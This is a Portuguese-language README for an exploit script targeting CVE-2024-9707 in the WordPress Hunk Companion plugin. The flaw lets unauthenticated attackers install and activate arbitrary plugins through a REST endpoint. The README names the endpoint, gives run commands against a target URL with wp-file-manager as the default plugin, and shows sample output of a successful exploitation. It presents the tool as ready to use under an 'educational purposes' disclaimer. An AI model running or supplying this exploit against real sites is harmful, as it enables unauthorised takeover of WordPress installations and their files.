
O Plugin Hunk Companion para WordPress: Vulnerável a Instalação/Ativação Não Autorizada de Plugins (Versões até e incluindo a 1.8.4)
Este script explora a vulnerabilidade no plugin Hunk Companion do WordPress (CVE-2024-9707), permitindo que atacantes não autorizados instalem e ativem plugins arbitrários através do endpoint da API REST /wp-json/hc/v1/themehunk-import.
| Funcionalidade | Descrição |
|---|---|
| Detecção de Versão do Plugin | Verifica automaticamente a versão do plugin. |
| Verificação de Vulnerabilidade | Determina se a versão detectada é vulnerável (<= 1.8.4). |
| Instalação de Plugin | Explora a vulnerabilidade para instalar e ativar um plugin específico. |
requests, argparse.pip install requests
options:
-h, --help show this help message and exit
-u URL, --url URL Base URL of the WordPress site.
-p PLUGIN, --plugin PLUGIN
Plugin name (default: wp-file-manager).
2- Execute o script
python CVE-2024-9707.py -u <TARGET_URL> [-p <PLUGIN_NAME>]
python CVE-2024-9707.py -u https://example.com -p wp-file-manager
Detected version: 1.8.4
The site is vulnerable. Proceeding with exploitation.
Plugin installed and activated successfully.
Response Status: 200
Response Body: "http:\/\/192.168.100.74\/wordpress"
Este script é apenas para fins educacionais. Use-o de forma responsável e apenas em sistemas que você possui ou tem permissão explícita para testar. Os autores não são responsáveis por qualquer uso indevido ou dano causado por esta ferramenta. por: Khaled_alenazi | Nxploited